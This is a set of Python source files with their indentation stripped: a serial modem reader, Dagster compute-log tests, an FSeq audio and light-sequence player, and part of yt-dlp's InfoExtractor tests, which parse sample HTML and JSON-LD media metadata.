start_time = datetime.now()
while not self._sync_execution_completed and (datetime.now() - start_time).total_seconds() < timeout_seconds:
time.sleep(0.05)
if not self._sync_execution_completed:
self.log.info("Command timeout (tag {})".format(alp_command.tag_id))
return []
return self._sync_execution_response_cmds
def start_reading(self):
self._read_async_active = True
self.read_thread = Thread(target=self._read_async)
self.read_thread.daemon = True
self.read_thread.start()
def stop_reading(self):
self._read_async_active = False
self.dev.cancel_read()
self.read_thread.join()
def get_unsolicited_responses_received(self):
return self._unsolicited_responses_received
def clear_unsolicited_responses_received(self):
self._unsolicited_responses_received = []
def get_rebooted_received(self):
return self._rebooted_received
def clear_rebooted_received(self):
self._rebooted_received = []
def _read_async(self):
self.log.info("starting read thread")
data_received = bytearray()
while self._read_async_active:
try:
data_received = self.dev.read()
except serial.SerialException as e:
self.log.warning("SerialException {} received, trying to reconnect".format(e.errno))
self.dev.close()
time.sleep(5)
self.dev.open()
if len(data_received) > 0:
# self.log.debug("< " + " ".join(map(lambda b: format(b, "02x"), bytearray(data_received))))
(message_types, cmds, info) = self.parser.parse(data_received)
for error in info["errors"]:
error["buffer"] = " ".join(map(lambda b: format(b, "02x"), bytearray(data_received)))
self.log.warning("Parser error: {}".format(error))
cmd_cnt = 0
for cmd in cmds:
if not self.skip_alp_parsing and hasattr(cmd, 'tag_id') and self._sync_execution_tag_id != None and self._sync_execution_tag_id == cmd.tag_id and message_types[cmd_cnt] <= MessageType.PING_RESPONSE:
self.log.info("Received response for sync execution")
self._sync_execution_response_cmds.append(cmd)
if cmd.execution_completed:
self.log.info("cmd with tag {} done".format(cmd.tag_id))
self._sync_execution_completed = True
else:
self.log.info("cmd with tag {} not done yet, expecting more responses".format(cmd.tag_id))
elif self.unsolicited_response_received_callback != None and self.connected and message_types[cmd_cnt] <= MessageType.PING_RESPONSE: # skip responses until connected
self.unsolicited_response_received_callback(cmd)
elif message_types[cmd_cnt] == MessageType.REBOOTED:
if self.rebooted_callback != None:
self.rebooted_callback(cmd)
else:
self._rebooted_received.append(cmd)
elif message_types[cmd_cnt] == MessageType.LOGGING:
self.log.info("logging: {}".format(cmd))
elif message_types[cmd_cnt] <= MessageType.PING_RESPONSE:
self.log.info("Received a response which was not requested synchronously or no async callback provided")
self._unsolicited_responses_received.append(cmd)
cmd_cnt += 1
self.log.info("end read thread")
class ModemConnectionError(Exception):
pass
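# Illustrative usage sketch (not part of the original module); the device path,
# baudrate and handle_cmd callback are hypothetical placeholders:
#     modem = Modem("/dev/ttyUSB0", 115200,
#                   unsolicited_response_received_callback=handle_cmd)
#     if modem.connect():
#         responses = modem.execute_command(some_alp_command, timeout_seconds=10)
#     modem.stop_reading()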
|
test_stdout.py
|
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.core.test_utils import create_run_for_test, instance_for_test
from dagster.seven import multiprocessing
HELLO_SOLID = "HELLO SOLID"
HELLO_RESOURCE = "HELLO RESOURCE"
SEPARATOR = os.linesep if (os.name == "nt" and sys.version_info < (3,)) else "\n"
@resource
def resource_a(_):
print(HELLO_RESOURCE) # pylint: disable=print-call
return "A"
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition("num", int)], required_resource_keys={"a"})
def spew(_, num):
print(HELLO_SOLID) # pylint: disable=print-call
return num
def define_pipeline():
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return "\n".join([line for line in s.replace(os.linesep, "\n").split("\n") if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = reconstructable(define_pipeline)
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
run_config={"storage": {"filesystem": {}}, "execution": {"multiprocess": {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
with instance_for_test() as instance:
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = "spew"
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace("\x1b[34m", "").replace("\x1b[0m", "")
assert "dagster - DEBUG - spew_pipeline - " in cleaned_logs
bad_logs = manager.read_logs_file("not_a_run_id", step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed("not_a_run_id", step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
step_key = "spew"
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
def gen_solid_name(length):
return "".join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
run_config={"solids": {solid_name: {"inputs": {"num": 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
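# Emits a few numbered lines to stdout inside a compute-log watch for the given step,
# so the tests below can assert that output is captured and filed under each step key.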
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, "inner 1") # pylint: disable=print-call
print(step_key, "inner 2") # pylint: disable=print-call
print(step_key, "inner 3") # pylint: disable=print-call
time.sleep(0.1)
def expected_inner_output(step_key):
return "\n".join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return "\n".join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
process = multiprocessing.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
        # The way that the multiprocess compute-logging interacts with pytest (which stubs out the
        # sys.stdout fileno) makes this difficult to test: the pytest-captured stdout only contains
        # the stdout of the outer process, not that of the inner processes.
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
player.py
|
from typing import Callable, List
import fseq
from enum import Enum
import pyaudio
import wave
class ParamError(Exception):
pass
class ChannelType(Enum):
UNKNOWN = -1
NOOP = 0
TRANSITION = 1 # the callback will be (channel, change_to_state)
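# Replays one channel's (time_ms, state) sequence: waits out the gap between
# consecutive transitions and invokes the callback as callback(channel, new_state).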
def _run(channel_type_callback, seq, channel):
import time
channel_type_callback(channel, seq[0][1])
for i in range(1, len(seq)):
time.sleep((seq[i][0] - seq[i - 1][0]) / 1000)
channel_type_callback(channel, seq[i][1])
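# Streams the wave file to the PyAudio output stream. Defined at module level so it
# can be handed to threading.Thread(target=playx, args=[player]), with the FSeqPlayer
# instance passed in explicitly as `self`.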
def playx(self):
chunk = 2048
data = self.wf.readframes(chunk)
    # wave.readframes returns bytes, so `data != ''` is always true in Python 3;
    # loop until no frames remain instead.
    while len(data) > 0:
self.stream.write(data)
data = self.wf.readframes(chunk)
class FSeqPlayer:
def __init__(self, fseq_file: str, music_path: str = None) -> None:
f = open(fseq_file, "rb")
fq = fseq.parse(f)
self.number_of_channel = fq.channel_count_per_frame
fd = []
for i in range(fq.number_of_frames):
d = fq.get_frame(i)
fd.append(d)
self.data = fd
self._step_time_in_ms = fq.step_time_in_ms
        if music_path is None:
found = False
for key, value in fq.variable_headers:
if key == 'mf':
music_path = value
found = True
if not found:
                raise ParamError("music_path not found in fseq file; you need to supply one via the music_path parameter")
self.wf = wave.open(music_path, 'rb')
self.p = pyaudio.PyAudio()
        self.stream = self.p.open(
            format=self.p.get_format_from_width(self.wf.getsampwidth()),
            channels=self.wf.getnchannels(),
            rate=self.wf.getframerate(),
            output=True,
        )
self.channel_types = [ChannelType.UNKNOWN for i in range(self.number_of_channel)]
def prepare_channel(self, channel_types: List[ChannelType] = None, channel_type_callback: Callable[[int], ChannelType] = None):
        if channel_types is not None:
assert len(channel_types) == self.number_of_channel
self.channel_types = channel_types
else:
for i in range(self.number_of_channel):
self.channel_types[i] = channel_type_callback(i)
self.trigger_channels = set()
self.seq = {}
for j in range(self.number_of_channel):
if self.channel_types[j] == ChannelType.TRANSITION:
self.trigger_channels.add(j)
last = self.data[0][j]
self.seq[j] = []
self.seq[j].append((0, last))
for i in range(1, len(self.data)):
t = self._step_time_in_ms * i
d = self.data[i][j]
if d != last:
self.seq[j].append((t, d))
last = d
def play(self, channel_type_callback: Callable[[int, int], None]):
import threading
threads = []
for j in self.trigger_channels:
threads.append(threading.Thread(target=_run, args=[channel_type_callback, self.seq[j], j]))
threads.append(threading.Thread(target=playx, args=[self]))
for t in threads:
t.start()
for t in threads:
t.join()
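# --- Hypothetical usage sketch (not part of the original module) ---
# Assumes a "show.fseq" file whose 'mf' header points at an existing audio file;
# the print call stands in for whatever hardware output each channel drives.
if __name__ == "__main__":
    def classify(channel: int) -> ChannelType:
        # Treat every channel as a simple on/off transition channel.
        return ChannelType.TRANSITION

    def on_change(channel: int, state: int) -> None:
        # Replace with real output handling (e.g. GPIO, DMX, logging).
        print("channel", channel, "->", state)

    player = FSeqPlayer("show.fseq")  # music path resolved from the fseq 'mf' header
    player.prepare_channel(channel_type_callback=classify)
    player.play(on_change)  # blocks until the audio and all channel sequences finish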
|
test_InfoExtractor.py
|
#!/usr/bin/env python3
from __future__ import unicode_literals
# Allow direct execution
import io
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import FakeYDL, expect_dict, expect_value, http_server_port
from yt_dlp.compat import compat_etree_fromstring, compat_http_server
from yt_dlp.extractor.common import InfoExtractor
from yt_dlp.extractor import YoutubeIE, get_info_extractor
from yt_dlp.utils import encode_data_uri, strip_jsonp, ExtractorError, RegexNotFoundError
import threading
TEAPOT_RESPONSE_STATUS = 418
TEAPOT_RESPONSE_BODY = "<h1>418 I'm a teapot</h1>"
class InfoExtractorTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def do_GET(self):
if self.path == '/teapot':
self.send_response(TEAPOT_RESPONSE_STATUS)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(TEAPOT_RESPONSE_BODY.encode())
else:
assert False
class DummyIE(InfoExtractor):
pass
class TestInfoExtractor(unittest.TestCase):
def setUp(self):
self.ie = DummyIE(FakeYDL())
def test_ie_key(self):
self.assertEqual(get_info_extractor(YoutubeIE.ie_key()), YoutubeIE)
def test_html_search_regex(self):
html = '<p id="foo">Watch this <a href="http://www.youtube.com/watch?v=BaW_jenozKc">video</a></p>'
search = lambda re, *args: self.ie._html_search_regex(re, html, *args)
self.assertEqual(search(r'<p id="foo">(.+?)</p>', 'foo'), 'Watch this video')
def test_opengraph(self):
ie = self.ie
html = '''
<meta name="og:title" content='Foo'/>
<meta content="Some video's description " name="og:description"/>
<meta property='og:image' content='http://domain.com/pic.jpg?key1=val1&key2=val2'/>
<meta content='application/x-shockwave-flash' property='og:video:type'>
<meta content='Foo' property=og:foobar>
<meta name="og:test1" content='foo > < bar'/>
<meta name="og:test2" content="foo >//< bar"/>
<meta property=og-test3 content='Ill-formatted opengraph'/>
'''
self.assertEqual(ie._og_search_title(html), 'Foo')
self.assertEqual(ie._og_search_description(html), 'Some video\'s description ')
self.assertEqual(ie._og_search_thumbnail(html), 'http://domain.com/pic.jpg?key1=val1&key2=val2')
self.assertEqual(ie._og_search_video_url(html, default=None), None)
self.assertEqual(ie._og_search_property('foobar', html), 'Foo')
self.assertEqual(ie._og_search_property('test1', html), 'foo > < bar')
self.assertEqual(ie._og_search_property('test2', html), 'foo >//< bar')
self.assertEqual(ie._og_search_property('test3', html), 'Ill-formatted opengraph')
self.assertEqual(ie._og_search_property(('test0', 'test1'), html), 'foo > < bar')
self.assertRaises(RegexNotFoundError, ie._og_search_property, 'test0', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._og_search_property, ('test0', 'test00'), html, None, fatal=True)
def test_html_search_meta(self):
ie = self.ie
html = '''
<meta name="a" content="1" />
<meta name='b' content='2'>
<meta name="c" content='3'>
<meta name=d content='4'>
<meta property="e" content='5' >
<meta content="6" name="f">
'''
self.assertEqual(ie._html_search_meta('a', html), '1')
self.assertEqual(ie._html_search_meta('b', html), '2')
self.assertEqual(ie._html_search_meta('c', html), '3')
self.assertEqual(ie._html_search_meta('d', html), '4')
self.assertEqual(ie._html_search_meta('e', html), '5')
self.assertEqual(ie._html_search_meta('f', html), '6')
self.assertEqual(ie._html_search_meta(('a', 'b', 'c'), html), '1')
self.assertEqual(ie._html_search_meta(('c', 'b', 'a'), html), '3')
self.assertEqual(ie._html_search_meta(('z', 'x', 'c'), html), '3')
self.assertRaises(RegexNotFoundError, ie._html_search_meta, 'z', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._html_search_meta, ('z', 'x'), html, None, fatal=True)
def test_search_json_ld_realworld(self):
_TESTS = [
# https://github.com/ytdl-org/youtube-dl/issues/23306
(
r'''<script type="application/ld+json">
{
"@context": "http://schema.org/",
"@type": "VideoObject",
"name": "1 On 1 With Kleio",
"url": "https://www.eporner.com/hd-porn/xN49A1cT3eB/1-On-1-With-Kleio/",
"duration": "PT0H12M23S",
"thumbnailUrl": ["https://static-eu-cdn.eporner.com/thumbs/static4/7/78/780/780814/9_360.jpg", "https://imggen.eporner.com/780814/1920/1080/9.jpg"],
"contentUrl": "https://gvideo.eporner.com/xN49A1cT3eB/xN49A1cT3eB.mp4",
"embedUrl": "https://www.eporner.com/embed/xN49A1cT3eB/1-On-1-With-Kleio/",
"image": "https://static-eu-cdn.eporner.com/thumbs/static4/7/78/780/780814/9_360.jpg",
"width": "1920",
"height": "1080",
"encodingFormat": "mp4",
"bitrate": "6617kbps",
"isFamilyFriendly": "False",
"description": "Kleio Valentien",
"uploadDate": "2015-12-05T21:24:35+01:00",
"interactionStatistic": {
"@type": "InteractionCounter",
"interactionType": { "@type": "http://schema.org/WatchAction" },
"userInteractionCount": 1120958
}, "aggregateRating": {
"@type": "AggregateRating",
"ratingValue": "88",
"ratingCount": "630",
"bestRating": "100",
"worstRating": "0"
}, "actor": [{
"@type": "Person",
"name": "Kleio Valentien",
"url": "https://www.eporner.com/pornstar/kleio-valentien/"
}]}
</script>''',
{
'title': '1 On 1 With Kleio',
'description': 'Kleio Valentien',
'url': 'https://gvideo.eporner.com/xN49A1cT3eB/xN49A1cT3eB.mp4',
'timestamp': 1449347075,
'duration': 743.0,
'view_count': 1120958,
'width': 1920,
'height': 1080,
},
{},
),
(
r'''<script type="application/ld+json">
{
"@context": "https://schema.org",
"@graph": [
{
"@type": "NewsArticle",
"mainEntityOfPage": {
"@type": "WebPage",
"@id": "https://www.ant1news.gr/Society/article/620286/symmoria-anilikon-dikigoros-thymaton-ithelan-na-toys-apoteleiosoyn"
},
"headline": "Συμμορία ανηλίκων – δικηγόρος θυμάτων: ήθελαν να τους αποτελειώσουν",
"name": "Συμμορία ανηλίκων – δικηγόρος θυμάτων: ήθελαν να τους αποτελειώσουν",
"description": "Τα παιδιά δέχθηκαν την επίθεση επειδή αρνήθηκαν να γίνουν μέλη της συμμορίας, ανέφερε ο Γ. Ζαχαρόπουλος.",
"image": {
"@type": "ImageObject",
"url": "https://ant1media.azureedge.net/imgHandler/1100/a635c968-be71-447c-bf9c-80d843ece21e.jpg",
"width": 1100,
"height": 756 },
"datePublished": "2021-11-10T08:50:00+03:00",
"dateModified": "2021-11-10T08:52:53+03:00",
"author": {
"@type": "Person",
"@id": "https://www.ant1news.gr/",
"name": "Ant1news",
"image": "https://www.ant1news.gr/images/logo-e5d7e4b3e714c88e8d2eca96130142f6.png",
"url": "https://www.ant1news.gr/"
},
"publisher": {
"@type": "Organization",
"@id": "https://www.ant1news.gr#publisher",
"name": "Ant1news",
"url": "https://www.ant1news.gr",
"logo": {
"@type": "ImageObject",
"url": "https://www.ant1news.gr/images/logo-e5d7e4b3e714c88e8d2eca96130142f6.png",
"width": 400,
"height": 400 },
"sameAs": [
"https://www.facebook.com/Ant1news.gr",
"https://twitter.com/antennanews",
"https://www.youtube.com/channel/UC0smvAbfczoN75dP0Hw4Pzw",
"https://www.instagram.com/ant1news/"
]
},
"keywords": "μαχαίρωμα,συμμορία ανηλίκων,ΕΙΔΗΣΕΙΣ,ΕΙΔΗΣΕΙΣ ΣΗΜΕΡΑ,ΝΕΑ,Κοινωνία - Ant1news",
"articleSection": "Κοινωνία"
}
]
}
</script>''',
{
'timestamp': 1636523400,
'title': 'md5:91fe569e952e4d146485740ae927662b',
},
{'expected_type': 'NewsArticle'},
),
]
for html, expected_dict, search_json_ld_kwargs in _TESTS:
expect_dict(
self,
self.ie._search_json_ld(html, None, **search_json_ld_kwargs),
expected_dict
)
def test_download_json(self):
uri = encode_data_uri(b'{"foo": "blah"}', 'application/json')
self.assertEqual(self.ie._download_json(uri, None), {'foo': 'blah'})
uri = encode_data_uri(b'callback({"foo": "blah"})', 'application/javascript')
self.assertEqual(self.ie._download_json(uri, None, transform_source=strip_jsonp), {'foo': 'blah'})
uri = encode_data_uri(b'{"foo": invalid}', 'application/json')
self.assertRaises(ExtractorError, self.ie._download_json, uri, None)
self.assertEqual(self.ie._download_json(uri, None, fatal=False), None)
def test_parse_html5_media_entries(self):
# inline video tag
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://127.0.0.1/video.html',
r'<html><video src="/vid.mp4" /></html>', None)[0],
{
'formats': [{
'url': 'https://127.0.0.1/vid.mp4',
}],
})
# from https://www.r18.com/
# with kpbs in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.r18.com/',
r'''
<video id="samplevideo_amateur" class="js-samplevideo video-js vjs-default-skin vjs-big-play-centered" controls preload="auto" width="400" height="225" poster="//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4" type="video/mp4" res="240" label="300kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4" type="video/mp4" res="480" label="1000kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4" type="video/mp4" res="740" label="1500kbps">
<p>Your browser does not support the video tag.</p>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4',
'ext': 'mp4',
'format_id': '300kbps',
'height': 240,
'tbr': 300,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4',
'ext': 'mp4',
'format_id': '1000kbps',
'height': 480,
'tbr': 1000,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4',
'ext': 'mp4',
'format_id': '1500kbps',
'height': 740,
'tbr': 1500,
}],
'thumbnail': '//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg'
})
# from https://www.csfd.cz/
# with width and height
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.csfd.cz/',
r'''
<video width="770" height="328" preload="none" controls poster="https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360" >
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4" type="video/mp4" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4" type="video/mp4" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4" type="video/mp4" width="1920" height="1080">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm" type="video/webm" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm" type="video/webm" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm" type="video/webm" width="1920" height="1080">
<track src="https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt" type="text/x-srt" kind="subtitles" srclang="cs" label="cs">
</video>
''', None)[0],
{
'formats': [{
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4',
'ext': 'mp4',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4',
'ext': 'mp4',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4',
'ext': 'mp4',
'width': 1920,
'height': 1080,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm',
'ext': 'webm',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm',
'ext': 'webm',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm',
'ext': 'webm',
'width': 1920,
'height': 1080,
}],
'subtitles': {
'cs': [{'url': 'https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt'}]
},
'thumbnail': 'https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360'
})
# from https://tamasha.com/v/Kkdjw
# with height in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://tamasha.com/v/Kkdjw',
r'''
<video crossorigin="anonymous">
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4" label="AUTO" res="0"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4"
label="240p" res="240"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4" type="video/mp4"
label="144p" res="144"/>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
}, {
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
'ext': 'mp4',
'format_id': '240p',
'height': 240,
}, {
'url': 'https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4',
'ext': 'mp4',
'format_id': '144p',
'height': 144,
}]
})
# from https://www.directvnow.com
# with data-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video id="vid1" class="header--video-masked active" muted playsinline>
<source data-src="https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'ext': 'mp4',
'url': 'https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4',
}]
})
# from https://www.directvnow.com
# with data-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video id="vid1" class="header--video-masked active" muted playsinline>
<source data-src="https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'url': 'https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4',
'ext': 'mp4',
}]
})
# from https://www.klarna.com/uk/
# with data-video-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video loop autoplay muted class="responsive-video block-kl__video video-on-medium">
<source src="" data-video-desktop data-video-src="https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'url': 'https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4',
'ext': 'mp4',
}],
})
def test_extract_jwplayer_data_realworld(self):
# from http://www.suffolk.edu/sjc/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type='text/javascript'>
jwplayer('my-video').setup({
file: 'rtmp://192.138.214.154/live/sjclive',
fallback: 'true',
width: '95%',
aspectratio: '16:9',
primary: 'flash',
mediaid:'XEgvuql4'
});
</script>
''', None, require_title=False),
{
'id': 'XEgvuql4',
'formats': [{
'url': 'rtmp://192.138.214.154/live/sjclive',
'ext': 'flv'
}]
})
# from https://www.pornoxo.com/videos/7564/striptease-from-sexy-secretary/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type="text/javascript">
jwplayer("mediaplayer").setup({
'videoid': "7564",
'width': "100%",
'aspectratio': "16:9",
'stretching': "exactfit",
'autostart': 'false',
'flashplayer': "https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf",
'file': "https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv",
